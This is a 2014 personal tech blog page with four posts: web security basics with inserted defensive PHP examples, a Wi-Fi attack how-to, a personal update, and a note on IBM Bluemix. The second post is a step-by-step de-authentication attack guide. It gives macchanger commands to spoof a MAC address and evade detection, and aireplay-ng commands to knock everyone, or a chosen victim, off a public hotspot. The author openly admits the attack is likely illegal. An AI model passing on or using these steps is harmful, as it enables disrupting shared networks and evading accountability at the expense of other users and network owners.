Monday, July 14, 2014

Web Application Security: A must read for developers

There are people who spend all their time trying to break your web application. Many ninjas have suffered at the hands of the black hats. Luckily, I happen to be a white hat.
There are many aspects to consider in making your web application secure. The Open Web Application Security Project (OWASP) has compiled a comprehensive list of known security issues and methods to protect yourself against them.
Some of the basic precautions you can take include:

Password Hashing 

Almost everyone builds a web application that requires users to log in with a username and a password. The credentials are stored in the database and retrieved when a user logs in.
It is important that you properly hash passwords before storing them. Password hashing is an irreversible, one-way function applied to the user's password. This means you can compare one hash against another to determine whether they came from the same source string, but you cannot recover the original string. If passwords are not hashed and your database is accessed by an unauthorized third party, every user account is compromised, and some users (unfortunately) reuse the same password for other services. Therefore, it is important to take security seriously.
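The hashing step above in working code. This is an added example, not code from the original post; it uses PHP's built-in password_hash()/password_verify() (PHP 5.5 and later) and constructed demo values in place of a real users table.

```php
<?php
// Added example, not code from the original post: store and check a password
// with PHP's built-in password_hash()/password_verify() (PHP >= 5.5).
// Each hash carries its own random salt, and the hash is the only thing that
// is ever written to the users table.

// Registration: returns the string to store in place of the password.
function hashForStorage($plaintext)
{
    // PASSWORD_DEFAULT is currently bcrypt; 'cost' is the work factor that
    // makes offline guessing against a leaked table slow.
    return password_hash($plaintext, PASSWORD_DEFAULT, ['cost' => 12]);
}

// Login: true if the submitted password produced the stored hash. The
// comparison is timing-safe and the original password is never recovered.
// $rehash receives a fresh hash when the stored one uses weaker settings
// than we want today; the caller should save it over the old hash.
function checkLogin($plaintext, $storedHash, &$rehash)
{
    $rehash = null;
    if (!password_verify($plaintext, $storedHash)) {
        return false;
    }
    if (password_needs_rehash($storedHash, PASSWORD_DEFAULT, ['cost' => 12])) {
        $rehash = hashForStorage($plaintext);   // only possible while we hold the plaintext
    }
    return true;
}

// Constructed demo values; in real code $stored comes from the database row.
$stored = hashForStorage('correct horse battery staple');
var_dump(checkLogin('correct horse battery staple', $stored, $new)); // right password
var_dump(checkLogin('Tr0ub4dor&3', $stored, $new));                 // wrong password
```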

Sanitization

Sanitization is a way of ensuring that illegal or unsafe characters are removed from foreign input.
For example, you should sanitize foreign input before including it in HTML or inserting it into a raw SQL query. When you use bound parameters with PDO, the driver handles this for you, so the input cannot alter the query.

Data Filtering

It is very bad for any app to accept foreign data without checking it, so make sure you sanitize and validate foreign input before letting it into your code.
While foreign data can be stored, combined, and accessed later, it is still foreign input. Every time you process, output, concatenate, or include data in your code, ask yourself whether the data has been filtered properly and can be trusted. Data may be filtered differently based on its purpose. For example, when unfiltered foreign input is passed into HTML page output, it can execute HTML and JavaScript on your site! This is known as Cross-Site Scripting (XSS) and can be a very dangerous attack. One way to avoid XSS is to sanitize all user-generated data before outputting it to your page, either by removing HTML tags with the strip_tags function or by escaping characters with special meaning into their respective HTML entities with the htmlentities or htmlspecialchars functions.

Validation

Validation ensures that foreign input is what you expect. For example, you may want to validate an email address, a phone number, or age when processing a registration submission.
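The sanitization, data filtering and validation sections above, carried through one registration submission. This is an added example, not code from the original post; it assumes an in-memory SQLite database, a constructed users table and a constructed form submission.

```php
<?php
// Added example, not code from the original post: one registration submission
// walked through the steps above (validate, bind into SQL with PDO, escape into
// HTML). Uses an in-memory SQLite database so it runs offline.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, age INTEGER, bio TEXT)');

// Validation: reject anything that is not the shape we expect.
function validateRegistration(array $input)
{
    $email = filter_var(isset($input['email']) ? $input['email'] : '', FILTER_VALIDATE_EMAIL);
    $age   = filter_var(isset($input['age']) ? $input['age'] : '', FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 13, 'max_range' => 120]]);
    if ($email === false || $age === false) {
        return null;    // caller shows a form error; nothing reaches the database
    }
    $bio = isset($input['bio']) ? (string) $input['bio'] : '';
    return ['email' => $email, 'age' => $age, 'bio' => $bio];
}

// VULNERABLE, shown for contrast: the input becomes part of the SQL text, so a
// quote inside it can end the string and change the query.
// $pdo->exec("INSERT INTO users (email) VALUES ('" . $input['email'] . "')");

// SAFE: bound parameters travel separately from the query text, so the database
// never interprets them as SQL and no manual escaping is needed.
function insertUser(PDO $pdo, array $clean)
{
    $stmt = $pdo->prepare('INSERT INTO users (email, age, bio) VALUES (:email, :age, :bio)');
    $stmt->execute([':email' => $clean['email'], ':age' => $clean['age'], ':bio' => $clean['bio']]);
    return (int) $pdo->lastInsertId();
}

// Output filtering: escape where data meets HTML, not on the way into storage.
function renderBio($bio)
{
    return '<p class="bio">' . htmlspecialchars($bio, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed submission: the bio carries a script tag and a single quote,
// which would be a stored XSS if it were echoed raw.
$submitted = ['email' => 'user@example.com', 'age' => '28',
              'bio' => "I'm <script>alert('xss')</script> harmless"];
if (($clean = validateRegistration($submitted)) !== null) {
    $sel = $pdo->prepare('SELECT bio FROM users WHERE id = ?');
    $sel->execute([insertUser($pdo, $clean)]);
    echo renderBio($sel->fetchColumn()), PHP_EOL;   // browser shows the tag as literal text
}
```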

Error Reporting

Error logging can be useful in finding the problem spots in your application, but it can also expose information about the structure of your application to the outside world. To effectively protect your application from issues that could be caused by the output of these messages, you need to configure your server differently in development versus production (live).

Configuration files

When creating configuration files for your applications, best practices recommend that one of the following methods be followed:
  • It is recommended that you store your configuration information where it cannot be accessed directly and pulled in via the file system.
  • Information in configuration files should be protected accordingly, either through encryption or through group/user file system permissions.
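The error reporting and configuration file advice above in working code. This is an added example, not code from the original post; APP_ENV, the log path, the [database] keys and the temporary config file it writes are all assumed for the demo.

```php
<?php
// Added example, not code from the original post: pick error output per
// environment and read configuration from a file outside the web root.
// APP_ENV, the log path and the [database] keys are assumed names.

$env = getenv('APP_ENV') ?: 'production';

// Development: show everything. Production: log everything, show nothing, so
// stack traces and file paths never reach a visitor's browser.
error_reporting(E_ALL);
ini_set('display_errors', $env === 'development' ? '1' : '0');
ini_set('log_errors', '1');
ini_set('error_log', sys_get_temp_dir() . '/myapp-php-error.log');   // assumed path

// The config file is read through the file system, never included as PHP and
// never placed under the document root where the web server could serve it.
function loadConfig($path)
{
    if (!is_readable($path)) {
        throw new RuntimeException("config not readable: $path");
    }
    // Refuse a secrets file that every user on the host can read.
    if (fileperms($path) & 0004) {
        throw new RuntimeException("config is world-readable; run: chmod 640 $path");
    }
    $cfg = parse_ini_file($path, true);
    if ($cfg === false || empty($cfg['database']['dsn'])) {
        throw new RuntimeException('config missing [database] dsn');
    }
    return $cfg;
}

// Constructed demo: write a sample config to a temp file with owner/group-only
// permissions, the way it would live in /etc/myapp/ on a real host.
$path = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($path, "[database]\ndsn = \"sqlite::memory:\"\nuser = app\npassword = \"placeholder-secret\"\n");
chmod($path, 0640);

$config = loadConfig($path);
$pdo = new PDO($config['database']['dsn'], $config['database']['user'], $config['database']['password']);
unlink($path);
```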

 

Friday, July 4, 2014

HACK: Bully everyone from using any wifi hotspot.

In this cold I cannot imagine someone giving me very hot coffee with slow Internet. I bet the consequences are unbearable.

This morning I went to the coffee shop to get a cup before heading to the office. There were several shops, but the "free wifi" label attracted me. I decided to take out my computer to finish leeching some torrents. But the shock that fell on me was devastating and unbearable. You can imagine what a married man who codes and has kids looks like when the kid pours coffee on the keyboard.
That's how I felt.
Anyway, I decided to throw everyone else out of the network (it's illegal, I guess).

I will give you a step by step procedure on how you can do that. Script kiddies, you might be very unlucky though.

This attack is referred to as a de-authentication attack. I am not liable or responsible for anything you may do with this information.


Requirements:
1. Brewed coffee that can last the whole day, because you will enjoy the speeds when no one else is using the "free wifi".
2. You must be running on a Linux platform.
3. Macchanger (sudo apt-get install macchanger).
4. Aircrack-ng (sudo apt-get install aircrack-ng).
5. Aireplay-ng (sudo apt-get install aircrack-ng).
6. A wifi card that can be put into monitor mode.
Step X co
First we need to check if your wifi card is communicating properly with your machine.
Open a terminal and run the following command:

sudo airmon-ng
This is the result:

Next we will have to create our monitor interface, then fake our MAC address to avoid being caught. Replace interface with the name of your interface; mine is wlan0.

airmon-ng stop
ifconfig interface down
macchanger --mac 00:11:22:33:44:55 interface
airmon-ng start interface
Step X do
Now it's time for action. Using aireplay-ng we are going to pick the MAC address of the hotspot we want to attack. Now run this command:

aireplay-ng -0 1 -a bssid monitorinterface
To stop the process use Ctrl-C, but only do this when you can no longer take more coffee.
Just in case you want to kick a hater out of the network, you will use a different command.

aireplay-ng -0 1 -a bssid -c victimmac interface
I think we are done; now you can enjoy fast internet without bothering about others.
Wifi admins, I am so sorry, but there is no way you can prevent this. Just holla at me for help. :-(

Thursday, July 3, 2014

ITS GOOD TO BE BACK.

It has been a really long time since I started contemplating writing this blog. Laziness crawled my way, and I have been in a serious war to ensure everything is back to normal. I am not sure if it is back. But anyway, I want to share a few lessons I learnt while I was away.

This will also serve as a guide towards the next articles i will be publishing.
So #whileiwasaway:
  • I learnt Java in a night, but with a few grams of coffee and some watts.
  • I was scared when I was asked about linked lists and arrays. You get scared because it is something you use daily but can't really define.
  • Went to a rally and just tried to imagine the future of machine intelligence.
  • I fell in love. It showed me logic doesn't apply everywhere.
Too many stories won't help us. But in the next few days I will try to focus on dissecting some of the lessons above and how we can use them to solve problems in the real world.

But today I just want to leave you with some questions.

Recently we have witnessed the growth of mobile money. What do you think is its future, and does other electronic money, such as Bitcoin, pose a threat to it?

If you delete My Computer, will your computer disappear?


Wednesday, May 21, 2014

Codename:Bluemix My new Love.

It couldn't be this simple to deploy my application to the cloud in just a few seconds. It's not only exciting but tremendous.
Codename:Bluemix is an implementation of IBM's Open Cloud Architecture, based on Cloud Foundry (a cloud computing Platform-as-a-Service software), to enable developers to rapidly build, deploy, and manage their cloud applications, while enjoying the availability of several services, runtimes and frameworks.
IBM will provide services and runtimes into the ecosystem based on its extensive software portfolio.
The product is at beta stage and currently available for developers to test free of charge, as in 'free as in beer'.
Being an enthusiast of the new product, I have been trying to explore some of its main goals, and they happen to be brief and understandable. They say that Bluemix will be able to:

  1. Reduce time for application/infrastructure provisioning.
  2. Allow for flexible capacity.
  3. Help to address any lack of internal tech resources.
  4. Reduce Total Cost of Ownership (TCO).
  5. Accelerate exploration of new workloads – social, mobile, big data.
This is the look and feel of the Dashboard.

For all developers out there interested in signing up for the beta, use this link: https://ace.ng.bluemix.net/
I will take you step by step through the process of uploading your PHP application to bluemix.
Some of the other capabilities Bluemix has include Java, mobile backend development, application monitoring, as well as capabilities from ecosystem partners and open source, all through an as-a-service model in the cloud.